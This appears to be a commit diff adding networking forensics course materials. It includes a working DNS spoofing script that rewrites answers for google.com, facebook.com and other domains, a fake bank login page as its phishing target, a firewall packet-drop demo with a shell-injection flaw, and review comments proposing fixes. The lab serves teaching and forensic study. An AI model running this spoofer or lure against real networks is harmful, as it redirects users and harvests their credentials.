add networking forensics draft. incompleted!
Binary file not shown.
BIN
Networking_Forensics/50_Firewall_Drop.pptx
Normal file
BIN
Networking_Forensics/50_Firewall_Drop.pptx
Normal file
Binary file not shown.
BIN
Networking_Forensics/70_DNS.pptx
Normal file
BIN
Networking_Forensics/70_DNS.pptx
Normal file
Binary file not shown.
BIN
Networking_Forensics/80_DNS_Spoof_Forensics.pptx
Normal file
BIN
Networking_Forensics/80_DNS_Spoof_Forensics.pptx
Normal file
Binary file not shown.
BIN
Networking_Forensics/lab_files/dns/dig_dns.pcap
Normal file
BIN
Networking_Forensics/lab_files/dns/dig_dns.pcap
Normal file
Binary file not shown.
BIN
Networking_Forensics/lab_files/dns/http_dns.pcap
Normal file
BIN
Networking_Forensics/lab_files/dns/http_dns.pcap
Normal file
Binary file not shown.
BIN
Networking_Forensics/lab_files/dns/http_ub_dns.pcap
Normal file
BIN
Networking_Forensics/lab_files/dns/http_ub_dns.pcap
Normal file
Binary file not shown.
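--- a/Networking_Forensics/lab_files/dns_spoof/dns_spoof.py
+++ b/Networking_Forensics/lab_files/dns_spoof/dns_spoof.py
@@ -0,0 +1,64 @@
+# https://www.geeksforgeeks.org/how-to-make-a-dns-spoof-attack-using-scapy-in-python/
+# https://www.thepythoncode.com/article/make-dns-spoof-python
+import os
+import logging as log
+from scapy.all import IP, DNSRR, DNS, UDP, DNSQR
+from netfilterqueue import NetfilterQueue
+
+
+class DnsSnoof:
+    def __init__(self, hostDict, queueNum):
+        self.hostDict = hostDict
+        self.queueNum = queueNum
+        self.queue = NetfilterQueue()
+
+    def __call__(self):
+        log.info("Snoofing....")
+        os.system(
+            f'iptables -I FORWARD -j NFQUEUE --queue-num {self.queueNum}')
+        self.queue.bind(self.queueNum, self.callBack)
+        try:
+            self.queue.run()
+        except KeyboardInterrupt:
+            os.system(
+                f'iptables -D FORWARD -j NFQUEUE --queue-num {self.queueNum}')
+            log.info("[!] iptable rule flushed")
+
+    def callBack(self, packet):
+        scapyPacket = IP(packet.get_payload())
+        if scapyPacket.haslayer(DNSRR):
+            try:
+                log.info(f'[original] { scapyPacket[DNSRR].summary()}')
+                queryName = scapyPacket[DNSQR].qname
+                if queryName in self.hostDict:
+                    scapyPacket[DNS].an = DNSRR(
+                        rrname=queryName, rdata=self.hostDict[queryName])
+                    scapyPacket[DNS].ancount = 1
+                    del scapyPacket[IP].len
+                    del scapyPacket[IP].chksum
+                    del scapyPacket[UDP].len
+                    del scapyPacket[UDP].chksum
+                    log.info(f'[modified] {scapyPacket[DNSRR].summary()}')
+                else:
+                    log.info(f'[not modified] { scapyPacket[DNSRR].rdata }')
+            except IndexError as error:
+                log.error(error)
+        packet.set_payload(bytes(scapyPacket))
+        return packet.accept()
+
+
+if __name__ == '__main__':
+    try:
+        hostDict = {
+            b"google.com.": "136.160.215.15",
+            b"facebook.com.": "136.160.215.15",
+            b"ubalt.com.": "136.160.215.15",
+            b"g00gle.com.": "136.160.215.15",
+        }
+        queueNum = 1
+        log.basicConfig(format='%(asctime)s - %(message)s',
+                        level = log.INFO)
+        snoof = DnsSnoof(hostDict, queueNum)
+        snoof()
+    except OSError as error:
+        log.error(error)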
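Review bot: The `iptables -I FORWARD -j NFQUEUE` rule inserted at the top of `DnsSnoof.__call__` is only deleted on `KeyboardInterrupt`; if `self.queue.bind()` or `self.queue.run()` fails with any other exception the rule stays in the FORWARD chain and keeps steering forwarded traffic into a queue that no longer has a listener. Move the `bind` inside the `try` and replace `except KeyboardInterrupt:` with `finally:` so the cleanup runs on every exit path, e.g. `finally:` / `self.queue.unbind()` / `os.system(f'iptables -D FORWARD -j NFQUEUE --queue-num {self.queueNum}')`, keeping the `log.info("[!] iptable rule flushed")` after it. The same cleanup-only-on-Ctrl-C pattern appears in `main()` of the later Python hunk (`@@ -0,0 +1,61 @@`), where `q.unbind()` and `iptables_remove_rule()` also sit under `except KeyboardInterrupt`. `DnsSnoof` / `"Snoofing...."` read as typos for "Spoof", but the class name is the module's interface, so rename it only together with any importer.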
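--- a/Networking_Forensics/lab_files/dns_spoof/index.html
+++ b/Networking_Forensics/lab_files/dns_spoof/index.html
@@ -0,0 +1,21 @@
+<!DOCTYPE html>
+<html>
+
+<head>
+    <title>Bank.com Login</title>
+</head>
+
+<body>
+    <h1>Bank.com Login</h1>
+    <form action="#" method="post">
+        <label for="username">Username:</label>
+        <input type="text" id="username" name="username" required><br><br>
+
+        <label for="password">Password:</label>
+        <input type="password" id="password" name="password" required><br><br>
+
+        <input type="submit" value="Login">
+    </form>
+</body>
+
+</html>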
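--- a/Networking_Forensics/lab_files/firewall/hello.html
+++ b/Networking_Forensics/lab_files/firewall/hello.html
@@ -0,0 +1,13 @@
+<!DOCTYPE html>
+<html>
+
+<head>
+    <title>Hello World</title>
+</head>
+
+<body>
+    <h1>Hello World! Network Forensics. </h1>
+    <p>Welcome to my simple web page.</p>
+</body>
+
+</html>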
@@ -0,0 +1,61 @@
|
||||
#!/usr/bin/env python3
|
||||
|
||||
import argparse
|
||||
import os
|
||||
import signal
|
||||
import sys
|
||||
|
||||
from netfilterqueue import NetfilterQueue
|
||||
from scapy.layers.inet import IP
|
||||
from scapy.sendrecv import send
|
||||
|
||||
|
||||
def iptables_add_rule(ip_address):
|
||||
os.system(f"iptables -A INPUT -s {ip_address} -j NFQUEUE --queue-num 1")
|
||||
|
||||
|
||||
def iptables_remove_rule(ip_address):
|
||||
os.system(f"iptables -D INPUT -s {ip_address} -j NFQUEUE --queue-num 1")
|
||||
|
||||
|
||||
def handle_packet(packet):
|
||||
ip = IP(packet.get_payload())
|
||||
source_ip = ip.src
|
||||
print(f"Receiving packet from {source_ip}")
|
||||
|
||||
if source_ip == args.source_ip:
|
||||
print(f"Dropping packet from {source_ip}")
|
||||
packet.drop()
|
||||
print("================================")
|
||||
|
||||
def parse_arguments():
|
||||
parser = argparse.ArgumentParser(description="Python script to demonstrate iptables functions")
|
||||
parser.add_argument("source_ip", help="Source IP address to filter")
|
||||
return parser.parse_args()
|
||||
|
||||
|
||||
def main():
|
||||
if os.geteuid() != 0:
|
||||
print("You must be root to run this script.")
|
||||
sys.exit(1)
|
||||
|
||||
global args
|
||||
args = parse_arguments()
|
||||
|
||||
iptables_add_rule(args.source_ip)
|
||||
|
||||
q = NetfilterQueue()
|
||||
q.bind(1, handle_packet)
|
||||
|
||||
try:
|
||||
print("Waiting incoming packets...")
|
||||
q.run()
|
||||
except KeyboardInterrupt:
|
||||
print("Exiting...")
|
||||
q.unbind()
|
||||
iptables_remove_rule(args.source_ip)
|
||||
print("Rules are removed...")
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
||||
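Review bot: `iptables_add_rule()` and `iptables_remove_rule()` interpolate `args.source_ip`, taken verbatim from the command line in `parse_arguments()`, into an `os.system()` shell string while `main()` requires the script to run as root (`os.geteuid() != 0`), so any argument that is not a plain address reaches the shell unescaped and a failed rule insertion is silently ignored because the return code is never checked. Validate the argument once with `ipaddress.ip_address()` (it raises `ValueError` for anything that is not an address literal) and invoke `iptables` via `subprocess.run([...], check=True)` with an argument list; that needs `import ipaddress` and `import subprocess`, while the unused `import signal` can be dropped. `handle_packet()` also depends on the module global `args` that `main()` creates through `global args`, so binding the address with `functools.partial(handle_packet, args.source_ip)` or a small closure would make the callback self-contained. The page does not show this hunk's file header, so the file path is unknown here. A shared helper for both rules could look like:
```python
def _iptables(action, ip_address):
    # ip_address() rejects anything that is not a literal IPv4/IPv6 address
    addr = str(ipaddress.ip_address(ip_address))
    subprocess.run(
        ["iptables", action, "INPUT", "-s", addr, "-j", "NFQUEUE", "--queue-num", "1"],
        check=True,
    )


def iptables_add_rule(ip_address):
    _iptables("-A", ip_address)


def iptables_remove_rule(ip_address):
    _iptables("-D", ip_address)

# … unchanged: handle_packet, parse_arguments, main …
```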
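--- a/Networking_Forensics/lab_files/firewall_forward/hello.html
+++ b/Networking_Forensics/lab_files/firewall_forward/hello.html
@@ -0,0 +1,13 @@
+<!DOCTYPE html>
+<html>
+
+<head>
+    <title>Hello World</title>
+</head>
+
+<body>
+    <h1>Hello World! Network Forensics. </h1>
+    <p>Welcome to my simple web page.</p>
+</body>
+
+</html>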